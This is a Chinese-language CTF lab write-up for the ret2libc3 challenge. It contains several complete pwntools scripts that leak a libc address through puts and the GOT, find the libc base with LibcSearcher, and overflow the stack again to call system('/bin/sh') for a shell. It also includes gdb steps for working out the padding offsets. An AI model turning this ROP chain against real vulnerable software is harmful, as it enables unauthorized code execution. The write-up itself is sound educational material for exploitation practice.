ret2libc3

主要借鉴wp
pwn学习之ret2libc3——偏移计算初体验https://www.jianshu.com/p/5525dde00053
适合新手的ret2libc3之路https://blog.csdn.net/qq_41918771/article/details/90665950
泄漏libc获取shell的模板https://blog.csdn.net/qq_38204481/article/details/80329676
Ret2libc3 https://www.jianshu.com/p/cd8864615288
ret2libc3 https://www.jianshu.com/p/df8645e63365
ret2libc3地址泄露https://blog.csdn.net/weixin_44642009/article/details/88630028
PWN学习，对CTF-wiki上的讲解进行一些补充https://blog.csdn.net/qq_33948522/article/details/93880812

wiki上的链接
https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/basic-rop-zh/

checksec ret2libc3

开了堆栈不可执行保护

IDA main函数F5

有gets函数，漏洞为栈溢出(申请64h大小，但是gets无限制）
没有system函数也没有binsh，要通过libc的函数相对偏移找出system()的真实地址

那么我们如何得到 system 函数的地址呢？这里就主要利用了两个知识点：

system 函数属于 libc，而 libc.so 动态链接库中的函数之间相对偏移是固定的。（记住公式：A真实地址-A的偏移地址 = B真实地址-B的偏移地址 = 基地址！）
即使程序有 ASLR 保护，也只是针对于地址中间位进行随机，最低的 12 位（三位十六进制位）并不会发生改变。而 libc 在 github 上有人进行收集，如下：https://github.com/niklasb/libc-database

所以如果我们知道 libc 中某个函数的地址，对比最低12位，那么我们就可以确定该程序利用的 libc。

一般是采用 got 表泄露的方法来得到某函数地址，即输出某个函数对应的 got 表项的内容。当然，由于 libc 的延迟绑定机制，我们需要泄漏已经执行过的函数的地址。
plt表：跳板，跳转到一个地址来加载libc库。文件中会对每个用到的函数分配一个plt函数
got表：经过plt表的跳转会在got表上写入地址，这个地址是函数调用的真实地址
注意：plt表只在程序调用函数之前有用，调用函数之后第二次执行这个函数就不会经过plt表。

我们自然可以根据上面的步骤先得到 libc，之后在程序中查询偏移，然后再次获取 system 地址，但这样手工操作次数太多，有点麻烦，这里给出一个 libc 的利用工具，具体细节请参考 readme

https://github.com/lieanu/LibcSearcher

此外，在得到 libc 之后，其实 libc 中也是有 /bin/sh 字符串的，所以我们可以一起获得 /bin/sh 字符串的地址。

这里泄露 __libc_start_main 的地址，这是因为它是程序最初被执行的地方（所以肯定已经执行过）。基本利用思路如下：

1、泄露 __libc_start_main 地址
2、获取 libc 版本
3、获取 system 地址与 /bin/sh 的地址
4、再次执行源程序
5、触发栈溢出执行 system(‘/bin/sh’)

下面开始干活

gdb爆偏移
gdb ret2libc3
cyclic 200（复制有规律乱码）
r
(把有规律乱码粘贴)
cyclic -l 0x62616164(报错地址)

上脚本

#!/usr/bin/env python
#-*-coding:utf-8-*-
from pwn import *
from LibcSearcher import LibcSearcher
sh = process('./ret2libc3')
elf = ELF('./ret2libc3') #以ELF为格式创建对象

puts_plt = elf.plt['puts']#puts的plt表的地址，我们需要利用puts函数泄露
libc_start_main_got = elf.got['__libc_start_main']#函数的真实地址，即我们要泄露的对象
main_plt = elf.symbols['main']#返回地址被覆盖为main函数的地址，再次执行main，以求再次溢出
print "puts_plt =",hex(puts_plt)
print "libc_start_main_got =",hex(libc_start_main_got)
print "main_plt =",hex(main_plt)

print "leak libc_start_main_got addr and return to main again"
#调用puts函数，打印泄漏libc_start_main函数的地址，最后返回main函数
payload = ''
payload += 'A'*112
payload += p32(puts_plt)#覆盖返回地址为puts函数
payload += p32(main_plt)#这里是puts函数返回的地址
payload += p32(libc_start_main_got)#这里是puts函数的参数

sh.sendlineafter('Can you find it !?', payload)
#p.recvuntil(’Can you find it !?’)#接收掉原文件的输出语句内容，如果不接收，则输入的payload便无法与之交互，文件的执行就会一直处于等待状态
#p.sendline(payload)

print "get the related addr"
libc_start_main_addr = u32(sh.recv()[0:4])#同u32(p.recv(4))，交互时接受返回的地址，由于是32位的文件，recv(4)是指只接收四个字节的信息，因为泄露的地址信息只存在于前四个字节，u32是指解包unpack，将一块数据解包成四个字节
print "libc_start_main_addr =",hex(libc_start_main_addr)
libc = LibcSearcher('__libc_start_main',libc_start_main_addr)
libcbase = libc_start_main_addr - libc.dump('__libc_start_main')
system_addr = libcbase + libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')
#libc_binsh=next(libc.search("/bin/sh"))或binsh_libc = libc.search('/bin/sh').next()
print "libcbase =",hex(libcbase)
print "system_addr =",hex(system_addr)
print "binsh_addr =",hex(binsh_addr)

print "getshell"
payload = ''
payload += 'A'*104
payload += p32(system_addr)
payload += p32(0xdeadbeef)
payload += p32(binsh_addr)

sh.sendline(payload)
sh.interactive()

main_plt = elf.symbols['_start']的差异
有的人main函数返回时用的是main_plt = elf.symbols['_start']，从以下文章得知，_start调用了__libc_start_main，__libc_start_main调用了main。用main_plt = elf.symbols['_start']的人第二次填充依旧是112，但是直接用main_plt = elf.symbols['main']的第二次填充个数为104。
https://blog.csdn.net/z_ryan/article/details/80985101

__start 这个符号是程序的起始
main 是被标准库调用的一个符号

_start由汇编代码实现。大致用如下伪代码表示：

void _start()
{
　　%ebp = 0;
　　int argc = pop from stack
　　char ** argv = top of stack;
　　__libc_start_main(main, argc, argv, __libc_csu_init, __linc_csu_fini,
　　edx, top of stack);
}

第二次填充104的解释
在这里解释一下为什么是104，其实我也不太知道，参考了以下文章，只是跟着他做
ret2libc3地址泄露https://blog.csdn.net/weixin_44642009/article/details/88630028

先贴一下这位作者的脚本（我略改了一下），他是泄露puts函数的，道理同，可以看见他在发送第一次payload后下了断点进行gdb调试

#!/usr/bin/env python
#-*-coding:utf-8-*-
from pwn import *
from LibcSearcher import * #库函数LibcSearcher
import pwnlib#能够进行动态调试

context.log_level='debug'
context.terminal=['gnome-terminal','-x','sh','-c']

p=process('./ret2libc3')
elf=ELF('./ret2libc3')
main=0x08048618
payload='a'*(0x6c+4)+p32(elf.plt['puts'])+p32(main)+p32(elf.got['puts'])
gdb.attach(p)
p.recvuntil('?')

p.sendline(payload)

puts=u32(p.recv(4))

print('puts',hex(puts))
libc =LibcSearcher('puts',puts)
libcbase=puts-libc.dump('puts')
system=libcbase+libc.dump('system')
bin_sh=libcbase+libc.dump('str_bin_sh')
print('system',hex(system))
print('binsh',hex(bin_sh))
payload='a'*(0x64+4)+p32(system)+p32(0xdeadbeef)+p32(bin_sh)

p.sendline(payload)
p.interactive()

我运行他的脚本，跟着他gdb，多次输入n跟到这里

可以看到填充个数为EBP+0x4-(ESP+4)=0xffc0e300+0x4-(0xffc0e280+0x1c)=0x68=104，我不知道这里的0x1c是什么意思，为什么要减掉它，希望得到指点。

可能是这个

也可能是这个

把我自己的脚本改一下跟着他做，结果也是104
我的改后版本，加了断点

#-*-coding:utf-8-*-
#!/usr/bin/env python
from pwn import *
from LibcSearcher import LibcSearcher
import pwnlib

context.terminal=['gnome-terminal','-x','sh','-c']

sh = process('./ret2libc3')
elf = ELF('./ret2libc3')

puts_plt = elf.plt['puts']
libc_start_main_got = elf.got['__libc_start_main']
main_plt = elf.symbols['main']
print "puts_plt =",hex(puts_plt)
print "main_plt =",hex(main_plt)

print "leak libc_start_main_got addr and return to main again"
payload = ''
payload += 'A'*112
payload += p32(puts_plt)#覆盖返回地址为puts函数
payload += p32(main_plt)#这里是puts函数返回的地址
payload += p32(libc_start_main_got)#这里是puts函数的参数

gdb.attach(sh)
sh.sendlineafter('Can you find it !?', payload)
#p.recvuntil(’Can you find it !?’)
#p.sendline(payload)

print "get the related addr"
libc_start_main_addr = u32(sh.recv()[0:4])
print "libc_start_main_addr =",hex(libc_start_main_addr)
libc = LibcSearcher('__libc_start_main',libc_start_main_addr)
libcbase = libc_start_main_addr - libc.dump('__libc_start_main')
system_addr = libcbase + libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')
print "libcbase =",hex(libcbase)
print "system_addr =",hex(system_addr)
print "binsh_addr =",hex(binsh_addr)

print "getshell"
payload = ''
payload += 'A'*104
payload += p32(system_addr)
payload += p32(0xdeadbeef)
payload += p32(binsh_addr)

sh.sendline(payload)
sh.interactive()

可以看到填充个数为EBP+0x4-(ESP+0x1c)=0xff8322a0+0x4-(0xff832220+0x1c)=0x68=104

看了这篇文章得到了一些关于104的启发
https://blog.csdn.net/qq_33948522/article/details/93880812

原来ESP+0x1c是IDA中显示的覆盖起始位置，这就不难理解填充个数为EBP+0x4-(ESP+0x1c)

还有一种方法是：
试错法
别人认为一开始时先写112，调试发现EIP=AAAA，ESP=AAAA，正常的应该是EBP被覆盖，EIP为ret指令要返回的位置，ESP为栈中ret上方的内容。故多了8个A，正确的应覆盖的大小为112-8=104

但是我觉得这样好像不严谨，因为只要输入比正确的填充个数多8个及以上，那输出的EIP和ESP都是AAAA，所以我试着把它混入一个B，我觉得这样才能真正确定要减回几个
把代码

payload += 'A'*112

改成

payload += 'A'*111+'B'

看到ESP变成了AAAB，现在我才能放心减8

手动选libc版本
对了，忘了说还有一点，运行后我们可能会遇到返回多个libc版本库的情况，人家原话是

可以通过add_condition(leaked_func, leaked_address)来添加限制条件，也可以手工选择其中一个libc版本（如果你确定的话）。

因为我不会用add_condition，所以就一个一个去手动选，这里如果有工具查到libc版本就最好（貌似那个叫libc database search的东西被502 bad gateway了），手工试出来真正的版本是2，libc6_2.23-0ubuntu10_i386。

如果用LibcSearcher在终端输命令的话，也会找到4个版本，道理跟上面是一样的。

最后成功交互是这个亚子